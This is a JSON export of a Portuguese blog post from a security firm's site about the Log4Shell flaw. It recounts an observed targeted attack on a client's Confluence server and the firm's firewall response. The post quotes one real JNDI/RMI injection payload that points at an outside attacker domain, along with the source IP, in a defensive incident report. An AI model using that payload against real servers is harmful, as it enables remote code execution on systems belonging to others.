{"id":1830,"date":"2021-12-27T21:20:52","date_gmt":"2021-12-28T00:20:52","guid":{"rendered":"https:\/\/www.xlabs.com.br\/blog\/?p=1830"},"modified":"2021-12-27T21:43:23","modified_gmt":"2021-12-28T00:43:23","slug":"o-log4j-e-a-xlabs-security","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/","title":{"rendered":"O Log4J e a XLabs Security"},"content":{"rendered":"\n<p>H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache, ao qual envolve uma esp\u00e9cie de inje\u00e7\u00e3o JNDI que carrega par\u00e2metros LDAP de um poss\u00edvel invasor, causando at\u00e9 mesmo execu\u00e7\u00e3o de comandos dentro das plataformas afetadas pela falha.<\/p>\n\n\n\n<p>Desde a divulga\u00e7\u00e3o da falha catalogada como CVE-2021-44228 estamos monitorando as atividades maliciosas contra clientes e at\u00e9 mesmo contra nossos pr\u00f3prios sistemas. Logo ap\u00f3s sua divulga\u00e7\u00e3o, no dia 09 de dezembro de 2021, houve tentativas oriundas de pa\u00edses asi\u00e1ticos, mais precisamente da China, na inten\u00e7\u00e3o de atacar grandes clientes nossos, ao qual operam um dos maiores Data Centers da Am\u00e9rica Latina.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/ataques-confluence-detectados-waf-xlabs.jpg\"><img decoding=\"async\" width=\"1004\" height=\"628\" src=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/ataques-confluence-detectados-waf-xlabs.jpg\" alt=\"\" class=\"wp-image-1832\"\/><\/a><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>O ataque propriamente dito, foi muito bem direcionado, indo em dire\u00e7\u00e3o a uma aplica\u00e7\u00e3o \u201cConfluence\u201d desse nosso cliente, aplica\u00e7\u00e3o mantida pelo desenvolvedor Atlassian.&nbsp;<\/p>\n\n\n\n<p>Passados alguns dias a pr\u00f3pria Atlassian, no dia 21 de dezembro de 2021, confirmou que plataformas \u201cConfluence\u201d estariam vulner\u00e1veis a execu\u00e7\u00e3o de comandos remotamente atrav\u00e9s da falha Log4Shell, o que nos levou a crer que o cliente em quest\u00e3o estaria na mira de algum grupo avan\u00e7ado de amea\u00e7as persistentes, provavelmente patrocinados pelo estado chin\u00eas, devido a import\u00e2ncia e o tamanho do \u201calvo\u201d, al\u00e9m das quest\u00f5es, localiza\u00e7\u00e3o da origem do ataque, a informa\u00e7\u00e3o \u201cprivilegiada\u201d antes mesmo do desenvolvedor confirmar a exist\u00eancia da falha nas plataformas \u201cConfluence\u201d.<\/p>\n\n\n\n<p>O IP de origem do ataque foi 114.254.20.186 de Beijing, China, e teve padr\u00f5es de inje\u00e7\u00f5es RMI, outro padr\u00e3o de verifica\u00e7\u00e3o da falha diferente da explora\u00e7\u00e3o por LDAP, o Payload utilizado foram varia\u00e7\u00f5es do tipo: \u201c${jndi:rmi:\/\/XXXX.l.i.yunzhanghu.co:443\/abc}\u201d utilizando-se do dom\u00ednio \u201cyunzhanghu.co\u201d, dom\u00ednio registrado em 15 de Junho de 2020, e muito pouco conhecido por atividades maliciosas na internet, outra raz\u00e3o ao qual desconfiamos de um ataque muito bem direcionado, informa\u00e7\u00f5es estas obtidas atrav\u00e9s de consultas a plataformas de IOC\u2019s, como V\u00edrus Total, Cisco Umbrella e demais outras plataformas que possu\u00edmos acessos para rastreios de atividades ilegais na internet.<\/p>\n\n\n\n<p>Ainda sobre a falha do Log4J, ao monitorarmos as atividades contra outros clientes, identificamos muitas varia\u00e7\u00f5es da explora\u00e7\u00e3o da vulnerabilidade, atacantes concatenando strings para formar a palavra JNDI, ou LDAP, que foram as primeiras palavras adicionadas em mecanismos de defesa como principais assinaturas dos ataques.<\/p>\n\n\n\n<p>Para deixar nossos clientes mais tranquilos, informamos que para as explora\u00e7\u00f5es mesmo em situa\u00e7\u00f5es como esta de um \u201c0day\u201d, durante o 09 de dezembro de 2021, no dia da divulga\u00e7\u00e3o da falha, identificamos e mitigamos explora\u00e7\u00f5es sem ao menos lan\u00e7armos assinaturas para a detec\u00e7\u00e3o da falha, pois <a href=\"https:\/\/www.xlabs.com.br\/waf\/\">nosso WAF<\/a> identifica os padr\u00f5es fora do normal de uma requisi\u00e7\u00e3o HTTP, e as requisi\u00e7\u00f5es da explora\u00e7\u00e3o do Log4Shell s\u00e3o enquadradas neste tipo, uma requisi\u00e7\u00e3o fora do padr\u00e3o HTTP.<\/p>\n\n\n\n<p>Para sermos ainda mais assertivos, no dia 10 de dezembro, come\u00e7amos os estudos para a manufatura de uma assinatura para a mitiga\u00e7\u00e3o da falha e tamb\u00e9m para as suas varia\u00e7\u00f5es e tentativas de ByPass, no mesmo dia j\u00e1 lan\u00e7amos as respectivas assinaturas. Nos dias seguintes \u00e0 divulga\u00e7\u00e3o do patch da falha, surgiram outras fragilidades no Log4J que at\u00e9 mesmo podem ocasionar a paralisa\u00e7\u00e3o de sistemas atrav\u00e9s de um \u201cDoS\u201d.<\/p>\n\n\n\n<p>No dia 20 de dezembro, ap\u00f3s termos uma base de dados bem s\u00f3lida dos ataques, passamos para a quest\u00e3o cognitiva do <a href=\"https:\/\/www.xlabs.com.br\/waf\/\">nosso WAF<\/a>, ensinando nossa intelig\u00eancia a reagir perante a identifica\u00e7\u00e3o dos ataques, ao qual nosso WAF identificando e barrando a requisi\u00e7\u00e3o maliciosa, j\u00e1 estabelece bloqueios din\u00e2micos \u00e0s origens desses ataques.<\/p>\n\n\n\n<p>Ainda durante o dia 20 de dezembro, conclu\u00edmos a aplica\u00e7\u00e3o de melhorias do nosso WAF e nossa Intelig\u00eancia, aplicando diversas melhorias na plataforma, incluindo a distribui\u00e7\u00e3o de blacklists din\u00e2micas entre os pr\u00f3prios WAF\u2019s, melhorando a quest\u00e3o da performance no bloqueios de ataques, dos mais variados tipos que nossa intelig\u00eancia identifica.<\/p>\n\n\n\n<p>Essas modifica\u00e7\u00f5es s\u00e3o t\u00e3o importantes que decidimos trazer num post futuro em nosso blog. Obviamente, nossos sistemas passam por cont\u00ednuos aprimoramentos, desenvolvidos e testados durante o m\u00eas corrente e aplicados gradativamente em nossa plataforma durante as primeiras semanas do m\u00eas subsequente.&nbsp;<\/p>\n\n\n\n<p>No gr\u00e1fico abaixo, podemos perceber a quantidade de requisi\u00e7\u00f5es chegando a nossos clientes nos dias que seguiram a divulga\u00e7\u00e3o da falha, e logo ap\u00f3s o dia 20 de dezembro, as requisi\u00e7\u00f5es come\u00e7aram a reduzir e serem suprimidas pelo nosso sistema de intelig\u00eancia juntamente com essas novas melhorias que implementamos.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/requisicoes-clientes-xlabs-apos-divulgacao-da-falha.jpg\"><img decoding=\"async\" width=\"1004\" height=\"683\" src=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/requisicoes-clientes-xlabs-apos-divulgacao-da-falha.jpg\" alt=\"\" class=\"wp-image-1833\"\/><\/a><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3><strong>Mas, e os sistemas da XLabs Security? Est\u00e3o protegidos contra o Log4Shell?<\/strong><\/h3>\n\n\n\n<p>Provavelmente voc\u00ea se perguntou tamb\u00e9m se nossos sistemas poderiam ou n\u00e3o ser afetados por esta falha, que por sinal ainda existem muitas outras aplica\u00e7\u00f5es a serem mapeadas para sabermos a exist\u00eancia ou n\u00e3o da falha \u201cembarcada\u201d em tais sistemas.<\/p>\n\n\n\n<p>A resposta para este questionamento \u00e9, depende. Estamos ainda avaliando a estrutura de softwares que possu\u00edmos em nossos ambientes, uma informa\u00e7\u00e3o importante a ser levada a nossos clientes e investidores \u00e9 que nossos ambientes expostos a internet, passaram por um rigoroso processo de verifica\u00e7\u00e3o, e at\u00e9 o momento n\u00e3o identificamos sistemas nossos vulner\u00e1veis a esta falha.&nbsp;<\/p>\n\n\n\n<p>Avaliamos tamb\u00e9m nossa plataforma de WAF para a identifica\u00e7\u00e3o de poss\u00edveis falhas em plugins e\/ou em aplica\u00e7\u00f5es que podemos utilizar internamente para monitoramento de nossos servidores, e at\u00e9 o momento n\u00e3o foram constatadas aplica\u00e7\u00f5es vulner\u00e1veis internamente em nossos WAF\u2019s.<\/p>\n\n\n\n<p>Obviamente, nossos WAF\u2019s j\u00e1 possuem a parte web deles protegida por eles pr\u00f3prios, inclusive identificamos diversos ataques contra nossas pr\u00f3prias plataformas de WAF\u2019s envolvendo a falha Log4Shell, mas todos mitigados e barrados por nosso WAF. Por\u00e9m, n\u00e3o podemos nos basear 100% na prote\u00e7\u00e3o do WAF, mesmo assim, analisamos nossas aplica\u00e7\u00f5es e sistemas internos na busca de poss\u00edveis brechas.<\/p>\n\n\n\n<p>Continuamos monitorando a situa\u00e7\u00e3o e a lista de aplica\u00e7\u00f5es afetadas pela falha, al\u00e9m de estarmos lado a lado com nossos clientes para uma melhor an\u00e1lise e forma de mitiga\u00e7\u00e3o dos riscos que essa e outras falhas podem ocasionar.<\/p>\n\n\n\n<p>Confira abaixo um resumo dos principais acontecimentos desde a divulga\u00e7\u00e3o da falha.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/linha-do-tempo-log4j-xlabs-security.png\"><img decoding=\"async\" width=\"1920\" height=\"1080\" src=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/linha-do-tempo-log4j-xlabs-security.png\" alt=\"\" class=\"wp-image-1834\"\/><\/a><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p class=\"has-small-font-size\">Refer\u00eancias:<\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/github.com\/NCSC-NL\/log4shell\">https:\/\/github.com\/NCSC-NL\/log4shell<\/a><\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b\">https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b<\/a><\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b\">https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b<\/a><\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228<\/a><\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45105\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45105<\/a><\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046<\/a><\/p>\n\n\n\n<p class=\"has-small-font-size\"><a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\">https:\/\/logging.apache.org\/log4j\/2.x\/security.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache, ao qual envolve uma esp\u00e9cie de inje\u00e7\u00e3o JNDI que carrega par\u00e2metros LDAP de um poss\u00edvel invasor, causando at\u00e9 mesmo execu\u00e7\u00e3o de comandos dentro das plataformas afetadas pela falha. Desde a divulga\u00e7\u00e3o da falha catalogada como CVE-2021-44228 [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":1831,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,61],"tags":[243,242,99,98,97],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>O Log4J e a XLabs Security &ndash; XLabs Security Blog<\/title>\n<meta name=\"description\" content=\"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"O Log4J e a XLabs Security &ndash; XLabs Security Blog\" \/>\n<meta property=\"og:description\" content=\"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\" \/>\n<meta property=\"og:site_name\" content=\"XLabs Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xlabs\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-28T00:20:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-12-28T00:43:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/o-log4j-e-a-xlabs-security-blog-post.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"488\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Evelyn Rocha\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"O Log4J e a XLabs Security &ndash; XLabs Security Blog\" \/>\n<meta name=\"twitter:description\" content=\"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/o-log4j-e-a-xlabs-security-blog-post.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Evelyn Rocha\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\"},\"author\":{\"name\":\"Evelyn Rocha\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/186fa2419710709368bfa220767edb4b\"},\"headline\":\"O Log4J e a XLabs Security\",\"datePublished\":\"2021-12-28T00:20:52+00:00\",\"dateModified\":\"2021-12-28T00:43:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\"},\"wordCount\":1170,\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"keywords\":[\"Log4J\",\"Log4Shell\",\"WAF\",\"Web Application Firewall\",\"XLabs Web Application Firewall\"],\"articleSection\":[\"Artigos\",\"Falhas de Seguran\u00e7a\"],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\",\"name\":\"O Log4J e a XLabs Security &ndash; XLabs Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\"},\"datePublished\":\"2021-12-28T00:20:52+00:00\",\"dateModified\":\"2021-12-28T00:43:23+00:00\",\"description\":\"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...\",\"breadcrumb\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.xlabs.com.br\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"O Log4J e a XLabs Security\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"name\":\"XLabs Security Blog\",\"description\":\"Seguran\u00e7a da Informa\u00e7\u00e3o\",\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\",\"name\":\"XLabs Security\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"contentUrl\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"width\":478,\"height\":168,\"caption\":\"XLabs Security\"},\"image\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.instagram.com\/xlabs.security\",\"https:\/\/www.linkedin.com\/company\/xlabs-security\/\",\"https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber\",\"https:\/\/www.facebook.com\/xlabs\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/186fa2419710709368bfa220767edb4b\",\"name\":\"Evelyn Rocha\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/fbfd8fc83a660edc367ca0dfbbb18e2e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/fbfd8fc83a660edc367ca0dfbbb18e2e?s=96&d=mm&r=g\",\"caption\":\"Evelyn Rocha\"},\"sameAs\":[\"http:\/\/www.xlabs.com.br\"],\"url\":\"https:\/\/www.xlabs.com.br\/blog\/author\/evelyn-rocha\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"O Log4J e a XLabs Security &ndash; XLabs Security Blog","description":"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/","og_locale":"pt_BR","og_type":"article","og_title":"O Log4J e a XLabs Security &ndash; XLabs Security Blog","og_description":"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...","og_url":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/","og_site_name":"XLabs Security Blog","article_publisher":"https:\/\/www.facebook.com\/xlabs","article_published_time":"2021-12-28T00:20:52+00:00","article_modified_time":"2021-12-28T00:43:23+00:00","og_image":[{"width":1000,"height":488,"url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/o-log4j-e-a-xlabs-security-blog-post.png","type":"image\/png"}],"author":"Evelyn Rocha","twitter_card":"summary_large_image","twitter_title":"O Log4J e a XLabs Security &ndash; XLabs Security Blog","twitter_description":"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...","twitter_image":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2021\/12\/o-log4j-e-a-xlabs-security-blog-post.png","twitter_misc":{"Escrito por":"Evelyn Rocha","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/#article","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/"},"author":{"name":"Evelyn Rocha","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/186fa2419710709368bfa220767edb4b"},"headline":"O Log4J e a XLabs Security","datePublished":"2021-12-28T00:20:52+00:00","dateModified":"2021-12-28T00:43:23+00:00","mainEntityOfPage":{"@id":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/"},"wordCount":1170,"publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"keywords":["Log4J","Log4Shell","WAF","Web Application Firewall","XLabs Web Application Firewall"],"articleSection":["Artigos","Falhas de Seguran\u00e7a"],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/","url":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/","name":"O Log4J e a XLabs Security &ndash; XLabs Security Blog","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#website"},"datePublished":"2021-12-28T00:20:52+00:00","dateModified":"2021-12-28T00:43:23+00:00","description":"H\u00e1 algumas semanas foi divulgada a falha Log4Shell, que afeta vers\u00f5es inferiores a 2.15.0 do aplicativo Log4J da Apache...","breadcrumb":{"@id":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.xlabs.com.br\/blog\/o-log4j-e-a-xlabs-security\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.xlabs.com.br\/blog\/"},{"@type":"ListItem","position":2,"name":"O Log4J e a XLabs Security"}]},{"@type":"WebSite","@id":"https:\/\/www.xlabs.com.br\/blog\/#website","url":"https:\/\/www.xlabs.com.br\/blog\/","name":"XLabs Security Blog","description":"Seguran\u00e7a da Informa\u00e7\u00e3o","publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/www.xlabs.com.br\/blog\/#organization","name":"XLabs Security","url":"https:\/\/www.xlabs.com.br\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","contentUrl":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","width":478,"height":168,"caption":"XLabs Security"},"image":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.instagram.com\/xlabs.security","https:\/\/www.linkedin.com\/company\/xlabs-security\/","https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber","https:\/\/www.facebook.com\/xlabs"]},{"@type":"Person","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/186fa2419710709368bfa220767edb4b","name":"Evelyn Rocha","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/fbfd8fc83a660edc367ca0dfbbb18e2e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/fbfd8fc83a660edc367ca0dfbbb18e2e?s=96&d=mm&r=g","caption":"Evelyn Rocha"},"sameAs":["http:\/\/www.xlabs.com.br"],"url":"https:\/\/www.xlabs.com.br\/blog\/author\/evelyn-rocha\/"}]}},"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/1830"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1830"}],"version-history":[{"count":4,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/1830\/revisions"}],"predecessor-version":[{"id":1838,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/1830\/revisions\/1838"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1831"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}